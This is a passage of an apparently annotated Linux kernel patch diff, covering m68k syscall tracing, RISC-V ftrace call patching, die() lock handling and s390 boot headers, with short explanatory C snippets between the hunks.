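          r = (uint64_t)((int64_t)(r << 44) >> 32);   /* sign-extend b31 */
          r |= addr & 0xfff;                          /* ori */
          r = (r & ~(0xfffffULL << 32)) | (addr & (0xfffffULL << 32));
          r = (r & ~(0xfffULL << 52)) | (addr & (0xfffULL << 52));
          return r;
  }

  int main(void)
  {
          assert(move_addr_model(0x90000000abcdef12ULL) ==
                 0x90000000abcdef12ULL);
          assert(move_addr_model(0x0000000080001000ULL) ==
                 0x0000000080001000ULL);
          return 0;
  }
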
+diff --git a/arch/m68k/68000/entry.S b/arch/m68k/68000/entry.S
+index 997b549330156..7d63e2f1555a0 100644
+--- a/arch/m68k/68000/entry.S
++++ b/arch/m68k/68000/entry.S
+@@ -45,6 +45,8 @@ do_trace:
+ 	jbsr	syscall_trace_enter
+ 	RESTORE_SWITCH_STACK
+ 	addql	#4,%sp
++	addql	#1,%d0
++	jeq	ret_from_exception
+ 	movel	%sp@(PT_OFF_ORIG_D0),%d1
+ 	movel	#-ENOSYS,%d0
+ 	cmpl	#NR_syscalls,%d1
+diff --git a/arch/m68k/Kconfig.devices b/arch/m68k/Kconfig.devices
+index 6a87b4a5fcac2..e6e3efac18407 100644
+--- a/arch/m68k/Kconfig.devices
++++ b/arch/m68k/Kconfig.devices
+@@ -19,6 +19,7 @@ config HEARTBEAT
+ # We have a dedicated heartbeat LED. :-)
+ config PROC_HARDWARE
+ 	bool "/proc/hardware support"
++	depends on PROC_FS
+ 	help
+ 	  Say Y here to support the /proc/hardware file, which gives you
+ 	  access to information about the machine you're running on,
+diff --git a/arch/m68k/coldfire/entry.S b/arch/m68k/coldfire/entry.S
+index 9f337c70243a3..35104c5417ff4 100644
+--- a/arch/m68k/coldfire/entry.S
++++ b/arch/m68k/coldfire/entry.S
+@@ -90,6 +90,8 @@ ENTRY(system_call)
+ 	jbsr	syscall_trace_enter
+ 	RESTORE_SWITCH_STACK
+ 	addql	#4,%sp
++	addql	#1,%d0
++	jeq	ret_from_exception
+ 	movel	%d3,%a0
+ 	jbsr	%a0@
+ 	movel	%d0,%sp@(PT_OFF_D0)		/* save the return value */
+diff --git a/arch/m68k/kernel/entry.S b/arch/m68k/kernel/entry.S
+index 18f278bdbd218..42879e6eb651d 100644
+--- a/arch/m68k/kernel/entry.S
++++ b/arch/m68k/kernel/entry.S
+@@ -184,9 +184,12 @@ do_trace_entry:
+ 	jbsr	syscall_trace_enter
+ 	RESTORE_SWITCH_STACK
+ 	addql	#4,%sp
++	addql	#1,%d0			| optimization for cmpil #-1,%d0
++	jeq	ret_from_syscall
+ 	movel	%sp@(PT_OFF_ORIG_D0),%d0
+ 	cmpl	#NR_syscalls,%d0
+ 	jcs	syscall
++	jra	ret_from_syscall
+ badsys:
+ 	movel	#-ENOSYS,%sp@(PT_OFF_D0)
+ 	jra	ret_from_syscall
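
All three m68k entry paths gain the same check: syscall_trace_enter() returns -1 when the tracer (seccomp, PTRACE_SYSEMU) wants the syscall suppressed, and that value was previously ignored. The addql #1 / jeq pair is the classic test-for-minus-one idiom; in C terms:

  #include <assert.h>

  /* "addql #1,%d0; jeq ..." tests d0 == -1 without a compare,
   * because -1 + 1 == 0 sets the zero flag. */
  static int skip_syscall(long trace_ret)
  {
          return trace_ret + 1 == 0;
  }

  int main(void)
  {
          assert(skip_syscall(-1));   /* tracer: suppress the syscall */
          assert(!skip_syscall(0));   /* proceed normally */
          return 0;
  }
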
+diff --git a/arch/mips/boot/dts/ingenic/ci20.dts b/arch/mips/boot/dts/ingenic/ci20.dts
+index f38c39572a9e8..8f21d2304737c 100644
+--- a/arch/mips/boot/dts/ingenic/ci20.dts
++++ b/arch/mips/boot/dts/ingenic/ci20.dts
+@@ -113,7 +113,7 @@
+ 		regulator-min-microvolt = <5000000>;
+ 		regulator-max-microvolt = <5000000>;
+ 
+-		gpio = <&gpf 14 GPIO_ACTIVE_LOW>;
++		gpio = <&gpf 15 GPIO_ACTIVE_LOW>;
+ 		enable-active-high;
+ 	};
+ };
+diff --git a/arch/mips/include/asm/syscall.h b/arch/mips/include/asm/syscall.h
+index 25fa651c937d5..ebdf4d910af2f 100644
+--- a/arch/mips/include/asm/syscall.h
++++ b/arch/mips/include/asm/syscall.h
+@@ -38,7 +38,7 @@ static inline bool mips_syscall_is_indirect(struct task_struct *task,
+ static inline long syscall_get_nr(struct task_struct *task,
+ 				  struct pt_regs *regs)
+ {
+-	return current_thread_info()->syscall;
++	return task_thread_info(task)->syscall;
+ }
+ 
+ static inline void mips_syscall_update_nr(struct task_struct *task,
+diff --git a/arch/powerpc/Makefile b/arch/powerpc/Makefile
+index dc4cbf0a5ca95..4fd630efe39d3 100644
+--- a/arch/powerpc/Makefile
++++ b/arch/powerpc/Makefile
+@@ -90,7 +90,7 @@ aflags-$(CONFIG_CPU_LITTLE_ENDIAN)	+= -mlittle-endian
+ 
+ ifeq ($(HAS_BIARCH),y)
+ KBUILD_CFLAGS	+= -m$(BITS)
+-KBUILD_AFLAGS	+= -m$(BITS) -Wl,-a$(BITS)
++KBUILD_AFLAGS	+= -m$(BITS)
+ KBUILD_LDFLAGS	+= -m elf$(BITS)$(LDEMULATION)
+ endif
+ 
+diff --git a/arch/powerpc/mm/book3s64/radix_tlb.c b/arch/powerpc/mm/book3s64/radix_tlb.c
+index 4e29b619578c1..6d7a1ef723e69 100644
+--- a/arch/powerpc/mm/book3s64/radix_tlb.c
++++ b/arch/powerpc/mm/book3s64/radix_tlb.c
+@@ -1179,15 +1179,12 @@ static inline void __radix__flush_tlb_range(struct mm_struct *mm,
+ 			}
+ 		}
+ 	} else {
+-		bool hflush = false;
++		bool hflush;
+ 		unsigned long hstart, hend;
+ 
+-		if (IS_ENABLED(CONFIG_TRANSPARENT_HUGEPAGE)) {
+-			hstart = (start + PMD_SIZE - 1) & PMD_MASK;
+-			hend = end & PMD_MASK;
+-			if (hstart < hend)
+-				hflush = true;
+-		}
++		hstart = (start + PMD_SIZE - 1) & PMD_MASK;
++		hend = end & PMD_MASK;
++		hflush = IS_ENABLED(CONFIG_TRANSPARENT_HUGEPAGE) && hstart < hend;
+ 
+ 		if (type == FLUSH_TYPE_LOCAL) {
+ 			asm volatile("ptesync": : :"memory");
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index e2b656043abf3..ee0d39b267946 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -138,7 +138,7 @@ config RISCV
+ 	select HAVE_DYNAMIC_FTRACE_WITH_REGS if HAVE_DYNAMIC_FTRACE
+ 	select HAVE_FTRACE_MCOUNT_RECORD if !XIP_KERNEL
+ 	select HAVE_FUNCTION_GRAPH_TRACER
+-	select HAVE_FUNCTION_TRACER if !XIP_KERNEL
++	select HAVE_FUNCTION_TRACER if !XIP_KERNEL && !PREEMPTION
+ 
+ config ARCH_MMAP_RND_BITS_MIN
+ 	default 18 if 64BIT
+diff --git a/arch/riscv/Makefile b/arch/riscv/Makefile
+index 82153960ac001..56b9219981665 100644
+--- a/arch/riscv/Makefile
++++ b/arch/riscv/Makefile
+@@ -11,7 +11,11 @@ LDFLAGS_vmlinux :=
+ ifeq ($(CONFIG_DYNAMIC_FTRACE),y)
+ 	LDFLAGS_vmlinux := --no-relax
+ 	KBUILD_CPPFLAGS += -DCC_USING_PATCHABLE_FUNCTION_ENTRY
+-	CC_FLAGS_FTRACE := -fpatchable-function-entry=8
++ifeq ($(CONFIG_RISCV_ISA_C),y)
++	CC_FLAGS_FTRACE := -fpatchable-function-entry=4
++else
++	CC_FLAGS_FTRACE := -fpatchable-function-entry=2
++endif
+ endif
+ 
+ ifeq ($(CONFIG_CMODEL_MEDLOW),y)
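
The patchable entry shrinks from the old 16-byte scheme (four 4-byte nops, enough to spill ra around the call) to the 8 bytes a bare auipc+jalr needs, and the nop count now tracks CONFIG_RISCV_ISA_C because -fpatchable-function-entry counts instructions, not bytes: with the C extension the compiler pads with 2-byte c.nop. The arithmetic, as a sketch:

  /* The pad must hold one auipc+jalr pair, i.e. 8 bytes. */
  int nops_needed(int rvc_enabled)
  {
          int nop_bytes = rvc_enabled ? 2 : 4;   /* c.nop vs. nop */
          return 8 / nop_bytes;                  /* 4 with RVC, 2 without */
  }
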
+diff --git a/arch/riscv/include/asm/ftrace.h b/arch/riscv/include/asm/ftrace.h
+index 04dad33800418..9e73922e1e2e5 100644
+--- a/arch/riscv/include/asm/ftrace.h
++++ b/arch/riscv/include/asm/ftrace.h
+@@ -42,6 +42,14 @@ struct dyn_arch_ftrace {
+  * 2) jalr: setting low-12 offset to ra, jump to ra, and set ra to
+  *          return address (original pc + 4)
+  *
++ *<ftrace enable>:
++ * 0: auipc  t0/ra, 0x?
++ * 4: jalr   t0/ra, ?(t0/ra)
++ *
++ *<ftrace disable>:
++ * 0: nop
++ * 4: nop
++ *
+  * Dynamic ftrace generates probes to call sites, so we must deal with
+  * both auipc and jalr at the same time.
+  */
+@@ -52,25 +60,43 @@ struct dyn_arch_ftrace {
+ #define AUIPC_OFFSET_MASK	(0xfffff000)
+ #define AUIPC_PAD		(0x00001000)
+ #define JALR_SHIFT		20
+-#define JALR_BASIC		(0x000080e7)
+-#define AUIPC_BASIC		(0x00000097)
++#define JALR_RA			(0x000080e7)
++#define AUIPC_RA		(0x00000097)
++#define JALR_T0			(0x000282e7)
++#define AUIPC_T0		(0x00000297)
+ #define NOP4			(0x00000013)
+ 
+-#define make_call(caller, callee, call)					\
++#define to_jalr_t0(offset)						\
++	(((offset & JALR_OFFSET_MASK) << JALR_SHIFT) | JALR_T0)
++
++#define to_auipc_t0(offset)						\
++	((offset & JALR_SIGN_MASK) ?					\
++	(((offset & AUIPC_OFFSET_MASK) + AUIPC_PAD) | AUIPC_T0) :	\
++	((offset & AUIPC_OFFSET_MASK) | AUIPC_T0))
++
++#define make_call_t0(caller, callee, call)				\
+ do {									\
+-	call[0] = to_auipc_insn((unsigned int)((unsigned long)callee -	\
+-				(unsigned long)caller));		\
+-	call[1] = to_jalr_insn((unsigned int)((unsigned long)callee -	\
+-			       (unsigned long)caller));			\
++	unsigned int offset =						\
++		(unsigned long) callee - (unsigned long) caller;	\
++	call[0] = to_auipc_t0(offset);					\
++	call[1] = to_jalr_t0(offset);					\
+ } while (0)
+ 
+-#define to_jalr_insn(offset)						\
+-	(((offset & JALR_OFFSET_MASK) << JALR_SHIFT) | JALR_BASIC)
++#define to_jalr_ra(offset)						\
++	(((offset & JALR_OFFSET_MASK) << JALR_SHIFT) | JALR_RA)
+ 
+-#define to_auipc_insn(offset)						\
++#define to_auipc_ra(offset)						\
+ 	((offset & JALR_SIGN_MASK) ?					\
+-	(((offset & AUIPC_OFFSET_MASK) + AUIPC_PAD) | AUIPC_BASIC) :	\
+-	((offset & AUIPC_OFFSET_MASK) | AUIPC_BASIC))
++	(((offset & AUIPC_OFFSET_MASK) + AUIPC_PAD) | AUIPC_RA) :	\
++	((offset & AUIPC_OFFSET_MASK) | AUIPC_RA))
++
++#define make_call_ra(caller, callee, call)				\
++do {									\
++	unsigned int offset =						\
++		(unsigned long) callee - (unsigned long) caller;	\
++	call[0] = to_auipc_ra(offset);					\
++	call[1] = to_jalr_ra(offset);					\
++} while (0)
+ 
+ /*
+  * Let auipc+jalr be the basic *mcount unit*, so we make it 8 bytes here.
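
The _t0 and _ra macro pairs emit the same PC-relative call through different link registers; the subtle part they share is AUIPC_PAD: jalr sign-extends its 12-bit immediate, so whenever bit 11 of the offset is set the auipc upper part must be bumped by 0x1000 to compensate. A standalone check of that encoding rule:

  #include <assert.h>
  #include <stdint.h>

  /* Model of the to_auipc_t0()/to_jalr_t0() split above. */
  static int32_t apply(uint32_t offset)
  {
          uint32_t hi = offset & 0xfffff000;      /* AUIPC_OFFSET_MASK */

          if (offset & 0x800)                     /* JALR_SIGN_MASK */
                  hi += 0x1000;                   /* AUIPC_PAD */
          /* jalr's immediate is the sign-extended low 12 bits: */
          return (int32_t)hi + ((int32_t)(offset << 20) >> 20);
  }

  int main(void)
  {
          assert(apply(0x00000800) == 0x800);               /* needs the pad */
          assert(apply(0xfffff7fc) == (int32_t)0xfffff7fc); /* negative */
          return 0;
  }
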
+diff --git a/arch/riscv/include/asm/jump_label.h b/arch/riscv/include/asm/jump_label.h
+index 6d58bbb5da467..14a5ea8d8ef0f 100644
+--- a/arch/riscv/include/asm/jump_label.h
++++ b/arch/riscv/include/asm/jump_label.h
+@@ -18,6 +18,7 @@ static __always_inline bool arch_static_branch(struct static_key * const key,
+ 					       const bool branch)
+ {
+ 	asm_volatile_goto(
++		"	.align		2			\n\t"
+ 		"	.option push				\n\t"
+ 		"	.option norelax				\n\t"
+ 		"	.option norvc				\n\t"
+@@ -39,6 +40,7 @@ static __always_inline bool arch_static_branch_jump(struct static_key * const ke
+ 						    const bool branch)
+ {
+ 	asm_volatile_goto(
++		"	.align		2			\n\t"
+ 		"	.option push				\n\t"
+ 		"	.option norelax				\n\t"
+ 		"	.option norvc				\n\t"
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index 3e01f4f3ab08a..6da0f3285dd2e 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -415,7 +415,7 @@ static inline void update_mmu_cache(struct vm_area_struct *vma,
+ 	 * Relying on flush_tlb_fix_spurious_fault would suffice, but
+ 	 * the extra traps reduce performance.  So, eagerly SFENCE.VMA.
+ 	 */
+-	flush_tlb_page(vma, address);
++	local_flush_tlb_page(address);
+ }
+ 
+ #define __HAVE_ARCH_UPDATE_MMU_TLB
+diff --git a/arch/riscv/include/asm/thread_info.h b/arch/riscv/include/asm/thread_info.h
+index 67322f878e0d7..f704c8dd57e04 100644
+--- a/arch/riscv/include/asm/thread_info.h
++++ b/arch/riscv/include/asm/thread_info.h
+@@ -43,6 +43,7 @@
+ #ifndef __ASSEMBLY__
+ 
+ extern long shadow_stack[SHADOW_OVERFLOW_STACK_SIZE / sizeof(long)];
++extern unsigned long spin_shadow_stack;
+ 
+ #include <asm/processor.h>
+ #include <asm/csr.h>
+diff --git a/arch/riscv/kernel/ftrace.c b/arch/riscv/kernel/ftrace.c
+index 2086f65857737..5bff37af4770b 100644
+--- a/arch/riscv/kernel/ftrace.c
++++ b/arch/riscv/kernel/ftrace.c
+@@ -55,12 +55,15 @@ static int ftrace_check_current_call(unsigned long hook_pos,
+ }
+ 
+ static int __ftrace_modify_call(unsigned long hook_pos, unsigned long target,
+-				bool enable)
++				bool enable, bool ra)
+ {
+ 	unsigned int call[2];
+ 	unsigned int nops[2] = {NOP4, NOP4};
+ 
+-	make_call(hook_pos, target, call);
++	if (ra)
++		make_call_ra(hook_pos, target, call);
++	else
++		make_call_t0(hook_pos, target, call);
+ 
+ 	/* Replace the auipc-jalr pair at once. Return -EPERM on write error. */
+ 	if (patch_text_nosync
+@@ -70,42 +73,13 @@ static int __ftrace_modify_call(unsigned long hook_pos, unsigned long target,
+ 	return 0;
+ }
+ 
+-/*
+- * Put 5 instructions with 16 bytes at the front of function within
+- * patchable function entry nops' area.
+- *
+- * 0: REG_S  ra, -SZREG(sp)
+- * 1: auipc  ra, 0x?
+- * 2: jalr   -?(ra)
+- * 3: REG_L  ra, -SZREG(sp)
+- *
+- * So the opcodes is:
+- * 0: 0xfe113c23 (sd)/0xfe112e23 (sw)
+- * 1: 0x???????? -> auipc
+- * 2: 0x???????? -> jalr
+- * 3: 0xff813083 (ld)/0xffc12083 (lw)
+- */
+-#if __riscv_xlen == 64
+-#define INSN0	0xfe113c23
+-#define INSN3	0xff813083
+-#elif __riscv_xlen == 32
+-#define INSN0	0xfe112e23
+-#define INSN3	0xffc12083
+-#endif
+-
+-#define FUNC_ENTRY_SIZE	16
+-#define FUNC_ENTRY_JMP	4
+-
+ int ftrace_make_call(struct dyn_ftrace *rec, unsigned long addr)
+ {
+-	unsigned int call[4] = {INSN0, 0, 0, INSN3};
+-	unsigned long target = addr;
+-	unsigned long caller = rec->ip + FUNC_ENTRY_JMP;
++	unsigned int call[2];
+ 
+-	call[1] = to_auipc_insn((unsigned int)(target - caller));
+-	call[2] = to_jalr_insn((unsigned int)(target - caller));
++	make_call_t0(rec->ip, addr, call);
+ 
+-	if (patch_text_nosync((void *)rec->ip, call, FUNC_ENTRY_SIZE))
++	if (patch_text_nosync((void *)rec->ip, call, MCOUNT_INSN_SIZE))
+ 		return -EPERM;
+ 
+ 	return 0;
+@@ -114,15 +88,14 @@ int ftrace_make_call(struct dyn_ftrace *rec, unsigned long addr)
+ int ftrace_make_nop(struct module *mod, struct dyn_ftrace *rec,
+ 		    unsigned long addr)
+ {
+-	unsigned int nops[4] = {NOP4, NOP4, NOP4, NOP4};
++	unsigned int nops[2] = {NOP4, NOP4};
+ 
+-	if (patch_text_nosync((void *)rec->ip, nops, FUNC_ENTRY_SIZE))
++	if (patch_text_nosync((void *)rec->ip, nops, MCOUNT_INSN_SIZE))
+ 		return -EPERM;
+ 
+ 	return 0;
+ }
+ 
+-
+ /*
+  * This is called early on, and isn't wrapped by
+  * ftrace_arch_code_modify_{prepare,post_process}() and therefore doesn't hold
+@@ -144,10 +117,10 @@ int ftrace_init_nop(struct module *mod, struct dyn_ftrace *rec)
+ int ftrace_update_ftrace_func(ftrace_func_t func)
+ {
+ 	int ret = __ftrace_modify_call((unsigned long)&ftrace_call,
+-				       (unsigned long)func, true);
++				       (unsigned long)func, true, true);
+ 	if (!ret) {
+ 		ret = __ftrace_modify_call((unsigned long)&ftrace_regs_call,
+-					   (unsigned long)func, true);
++					   (unsigned long)func, true, true);
+ 	}
+ 
+ 	return ret;
+@@ -159,16 +132,16 @@ int ftrace_modify_call(struct dyn_ftrace *rec, unsigned long old_addr,
+ 		       unsigned long addr)
+ {
+ 	unsigned int call[2];
+-	unsigned long caller = rec->ip + FUNC_ENTRY_JMP;
++	unsigned long caller = rec->ip;
+ 	int ret;
+ 
+-	make_call(caller, old_addr, call);
++	make_call_t0(caller, old_addr, call);
+ 	ret = ftrace_check_current_call(caller, call);
+ 
+ 	if (ret)
+ 		return ret;
+ 
+-	return __ftrace_modify_call(caller, addr, true);
++	return __ftrace_modify_call(caller, addr, true, false);
+ }
+ #endif
+ 
+@@ -203,12 +176,12 @@ int ftrace_enable_ftrace_graph_caller(void)
+ 	int ret;
+ 
+ 	ret = __ftrace_modify_call((unsigned long)&ftrace_graph_call,
+-				    (unsigned long)&prepare_ftrace_return, true);
++				    (unsigned long)&prepare_ftrace_return, true, true);
+ 	if (ret)
+ 		return ret;
+ 
+ 	return __ftrace_modify_call((unsigned long)&ftrace_graph_regs_call,
+-				    (unsigned long)&prepare_ftrace_return, true);
++				    (unsigned long)&prepare_ftrace_return, true, true);
+ }
+ 
+ int ftrace_disable_ftrace_graph_caller(void)
+@@ -216,12 +189,12 @@ int ftrace_disable_ftrace_graph_caller(void)
+ 	int ret;
+ 
+ 	ret = __ftrace_modify_call((unsigned long)&ftrace_graph_call,
+-				    (unsigned long)&prepare_ftrace_return, false);
++				    (unsigned long)&prepare_ftrace_return, false, true);
+ 	if (ret)
+ 		return ret;
+ 
+ 	return __ftrace_modify_call((unsigned long)&ftrace_graph_regs_call,
+-				    (unsigned long)&prepare_ftrace_return, false);
++				    (unsigned long)&prepare_ftrace_return, false, true);
+ }
+ #endif /* CONFIG_DYNAMIC_FTRACE */
+ #endif /* CONFIG_FUNCTION_GRAPH_TRACER */
+diff --git a/arch/riscv/kernel/mcount-dyn.S b/arch/riscv/kernel/mcount-dyn.S
+index d171eca623b6f..125de818d1bab 100644
+--- a/arch/riscv/kernel/mcount-dyn.S
++++ b/arch/riscv/kernel/mcount-dyn.S
+@@ -13,8 +13,8 @@
+ 
+ 	.text
+ 
+-#define FENTRY_RA_OFFSET	12
+-#define ABI_SIZE_ON_STACK	72
++#define FENTRY_RA_OFFSET	8
++#define ABI_SIZE_ON_STACK	80
+ #define ABI_A0			0
+ #define ABI_A1			8
+ #define ABI_A2			16
+@@ -23,10 +23,10 @@
+ #define ABI_A5			40
+ #define ABI_A6			48
+ #define ABI_A7			56
+-#define ABI_RA			64
++#define ABI_T0			64
++#define ABI_RA			72
+ 
+ 	.macro SAVE_ABI
+-	addi	sp, sp, -SZREG
+ 	addi	sp, sp, -ABI_SIZE_ON_STACK
+ 
+ 	REG_S	a0, ABI_A0(sp)
+@@ -37,6 +37,7 @@
+ 	REG_S	a5, ABI_A5(sp)
+ 	REG_S	a6, ABI_A6(sp)
+ 	REG_S	a7, ABI_A7(sp)
++	REG_S	t0, ABI_T0(sp)
+ 	REG_S	ra, ABI_RA(sp)
+ 	.endm
+ 
+@@ -49,24 +50,18 @@
+ 	REG_L	a5, ABI_A5(sp)
+ 	REG_L	a6, ABI_A6(sp)
+ 	REG_L	a7, ABI_A7(sp)
++	REG_L	t0, ABI_T0(sp)
+ 	REG_L	ra, ABI_RA(sp)
+ 
+ 	addi	sp, sp, ABI_SIZE_ON_STACK
+-	addi	sp, sp, SZREG
+ 	.endm
+ 
+ #ifdef CONFIG_DYNAMIC_FTRACE_WITH_REGS
+ 	.macro SAVE_ALL
+-	addi	sp, sp, -SZREG
+ 	addi	sp, sp, -PT_SIZE_ON_STACK
+ 
+-	REG_S x1,  PT_EPC(sp)
+-	addi	sp, sp, PT_SIZE_ON_STACK
+-	REG_L x1,  (sp)
+-	addi	sp, sp, -PT_SIZE_ON_STACK
++	REG_S t0,  PT_EPC(sp)
+ 	REG_S x1,  PT_RA(sp)
+-	REG_L x1,  PT_EPC(sp)
+-
+ 	REG_S x2,  PT_SP(sp)
+ 	REG_S x3,  PT_GP(sp)
+ 	REG_S x4,  PT_TP(sp)
+@@ -100,15 +95,11 @@
+ 	.endm
+ 
+ 	.macro RESTORE_ALL
++	REG_L t0,  PT_EPC(sp)
+ 	REG_L x1,  PT_RA(sp)
+-	addi	sp, sp, PT_SIZE_ON_STACK
+-	REG_S x1,  (sp)
+-	addi	sp, sp, -PT_SIZE_ON_STACK
+-	REG_L x1,  PT_EPC(sp)
+ 	REG_L x2,  PT_SP(sp)
+ 	REG_L x3,  PT_GP(sp)
+ 	REG_L x4,  PT_TP(sp)
+-	REG_L x5,  PT_T0(sp)
+ 	REG_L x6,  PT_T1(sp)
+ 	REG_L x7,  PT_T2(sp)
+ 	REG_L x8,  PT_S0(sp)
+@@ -137,17 +128,16 @@
+ 	REG_L x31, PT_T6(sp)
+ 
+ 	addi	sp, sp, PT_SIZE_ON_STACK
+-	addi	sp, sp, SZREG
+ 	.endm
+ #endif /* CONFIG_DYNAMIC_FTRACE_WITH_REGS */
+ 
+ ENTRY(ftrace_caller)
+ 	SAVE_ABI
+ 
+-	addi	a0, ra, -FENTRY_RA_OFFSET
++	addi	a0, t0, -FENTRY_RA_OFFSET
+ 	la	a1, function_trace_op
+ 	REG_L	a2, 0(a1)
+-	REG_L	a1, ABI_SIZE_ON_STACK(sp)
++	mv	a1, ra
+ 	mv	a3, sp
+ 
+ ftrace_call:
+@@ -155,8 +145,8 @@ ftrace_call:
+ 	call	ftrace_stub
+ 
+ #ifdef CONFIG_FUNCTION_GRAPH_TRACER
+-	addi	a0, sp, ABI_SIZE_ON_STACK
+-	REG_L	a1, ABI_RA(sp)
++	addi	a0, sp, ABI_RA
++	REG_L	a1, ABI_T0(sp)
+ 	addi	a1, a1, -FENTRY_RA_OFFSET
+ #ifdef HAVE_FUNCTION_GRAPH_FP_TEST
+ 	mv	a2, s0
+@@ -166,17 +156,17 @@ ftrace_graph_call:
+ 	call	ftrace_stub
+ #endif
+ 	RESTORE_ABI
+-	ret
++	jr t0
+ ENDPROC(ftrace_caller)
+ 
+ #ifdef CONFIG_DYNAMIC_FTRACE_WITH_REGS
+ ENTRY(ftrace_regs_caller)
+ 	SAVE_ALL
+ 
+-	addi	a0, ra, -FENTRY_RA_OFFSET
++	addi	a0, t0, -FENTRY_RA_OFFSET
+ 	la	a1, function_trace_op
+ 	REG_L	a2, 0(a1)
+-	REG_L	a1, PT_SIZE_ON_STACK(sp)
++	mv	a1, ra
+ 	mv	a3, sp
+ 
+ ftrace_regs_call:
+@@ -196,6 +186,6 @@ ftrace_graph_regs_call:
+ #endif
+ 
+ 	RESTORE_ALL
+-	ret
++	jr t0
+ ENDPROC(ftrace_regs_caller)
+ #endif /* CONFIG_DYNAMIC_FTRACE_WITH_REGS */
+diff --git a/arch/riscv/kernel/time.c b/arch/riscv/kernel/time.c
+index 8217b0f67c6cb..1cf21db4fcc77 100644
+--- a/arch/riscv/kernel/time.c
++++ b/arch/riscv/kernel/time.c
+@@ -5,6 +5,7 @@
+  */
+ 
+ #include <linux/of_clk.h>
++#include <linux/clockchips.h>
+ #include <linux/clocksource.h>
+ #include <linux/delay.h>
+ #include <asm/sbi.h>
+@@ -29,6 +30,8 @@ void __init time_init(void)
+ 
+ 	of_clk_init(NULL);
+ 	timer_probe();
++
++	tick_setup_hrtimer_broadcast();
+ }
+ 
+ void clocksource_arch_init(struct clocksource *cs)
+diff --git a/arch/riscv/kernel/traps.c b/arch/riscv/kernel/traps.c
+index 549bde5c970a1..70c98ce23be24 100644
+--- a/arch/riscv/kernel/traps.c
++++ b/arch/riscv/kernel/traps.c
+@@ -34,10 +34,11 @@ void die(struct pt_regs *regs, const char *str)
+ 	static int die_counter;
+ 	int ret;
+ 	long cause;
++	unsigned long flags;
+ 
+ 	oops_enter();
+ 
+-	spin_lock_irq(&die_lock);
++	spin_lock_irqsave(&die_lock, flags);
+ 	console_verbose();
+ 	bust_spinlocks(1);
+ 
+@@ -54,7 +55,7 @@ void die(struct pt_regs *regs, const char *str)
+ 
+ 	bust_spinlocks(0);
+ 	add_taint(TAINT_DIE, LOCKDEP_NOW_UNRELIABLE);
+-	spin_unlock_irq(&die_lock);
++	spin_unlock_irqrestore(&die_lock, flags);
+ 	oops_exit();
+ 
+ 	if (in_interrupt())
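
die() can be entered from contexts that already have interrupts disabled; spin_unlock_irq() would unconditionally re-enable them on exit, corrupting that state. The save/restore variant keeps whatever the caller had -- the general shape:

  /* Preserve the caller's IRQ state instead of forcing IRQs on. */
  unsigned long flags;

  spin_lock_irqsave(&die_lock, flags);      /* records current state */
  /* ... report the oops ... */
  spin_unlock_irqrestore(&die_lock, flags); /* restores it exactly */
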
+diff --git a/arch/riscv/mm/fault.c b/arch/riscv/mm/fault.c
+index d86f7cebd4a7e..eb0774d9c03b1 100644
+--- a/arch/riscv/mm/fault.c
++++ b/arch/riscv/mm/fault.c
+@@ -267,10 +267,12 @@ asmlinkage void do_page_fault(struct pt_regs *regs)
+ 	if (user_mode(regs))
+ 		flags |= FAULT_FLAG_USER;
+ 
+-	if (!user_mode(regs) && addr < TASK_SIZE &&
+-			unlikely(!(regs->status & SR_SUM)))
+-		die_kernel_fault("access to user memory without uaccess routines",
+-				addr, regs);
++	if (!user_mode(regs) && addr < TASK_SIZE && unlikely(!(regs->status & SR_SUM))) {
++		if (fixup_exception(regs))
++			return;
++
++		die_kernel_fault("access to user memory without uaccess routines", addr, regs);
++	}
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, addr);
+ 
+diff --git a/arch/s390/boot/boot.h b/arch/s390/boot/boot.h
+index 70418389414d3..939a1b7806df2 100644
+--- a/arch/s390/boot/boot.h
++++ b/arch/s390/boot/boot.h
+@@ -8,10 +8,26 @@
+ 
+ #ifndef __ASSEMBLY__
+ 
++struct vmlinux_info {
++	unsigned long default_lma;
++	void (*entry)(void);
++	unsigned long image_size;	/* does not include .bss */
++	unsigned long bss_size;		/* uncompressed image .bss size */
++	unsigned long bootdata_off;
++	unsigned long bootdata_size;
++	unsigned long bootdata_preserved_off;
++	unsigned long bootdata_preserved_size;
++	unsigned long dynsym_start;
++	unsigned long rela_dyn_start;
++	unsigned long rela_dyn_end;
++	unsigned long amode31_size;
++};
++
+ void startup_kernel(void);
+-unsigned long detect_memory(void);
++unsigned long detect_memory(unsigned long *safe_addr);
+ bool is_ipl_block_dump(void);
+ void store_ipl_parmblock(void);
++unsigned long read_ipl_report(unsigned long safe_addr);
+ void setup_boot_command_line(void);
+ void parse_boot_command_line(void);
+ void verify_facilities(void);
+@@ -20,6 +36,7 @@ void sclp_early_setup_buffer(void);
+ void print_pgm_check_info(void);
+ unsigned long get_random_base(unsigned long safe_addr);
+ void __printf(1, 2) decompressor_printk(const char *fmt, ...);
++void error(char *m);
+ 
+ /* Symbols defined by linker scripts */
+ extern const char kernel_version[];
+@@ -31,8 +48,11 @@ extern char __boot_data_start[], __boot_data_end[];
+ extern char __boot_data_preserved_start[], __boot_data_preserved_end[];
+ extern char _decompressor_syms_start[], _decompressor_syms_end[];
+ extern char _stack_start[], _stack_end[];
+-
+-unsigned long read_ipl_report(unsigned long safe_offset);
++extern char _end[];
++extern unsigned char _compressed_start[];
++extern unsigned char _compressed_end[];
++extern struct vmlinux_info _vmlinux_info;
++#define vmlinux _vmlinux_info
+ 
+ #endif /* __ASSEMBLY__ */
+ #endif /* BOOT_BOOT_H */
+diff --git a/arch/s390/boot/decompressor.c b/arch/s390/boot/decompressor.c
+index b519a1f045d8f..d762733a07530 100644
+--- a/arch/s390/boot/decompressor.c
++++ b/arch/s390/boot/decompressor.c
+@@ -11,6 +11,7 @@
+ #include <linux/string.h>
+ #include <asm/page.h>
+ #include "decompressor.h"
++#include "boot.h"
+ 
+ /*
+  * gzip declarations
+diff --git a/arch/s390/boot/decompressor.h b/arch/s390/boot/decompressor.h
+index f75cc31a77dd9..92b81d2ea35d6 100644
+--- a/arch/s390/boot/decompressor.h
++++ b/arch/s390/boot/decompressor.h
+@@ -2,37 +2,11 @@
+ #ifndef BOOT_COMPRESSED_DECOMPRESSOR_H
+ #define BOOT_COMPRESSED_DECOMPRESSOR_H
+ 
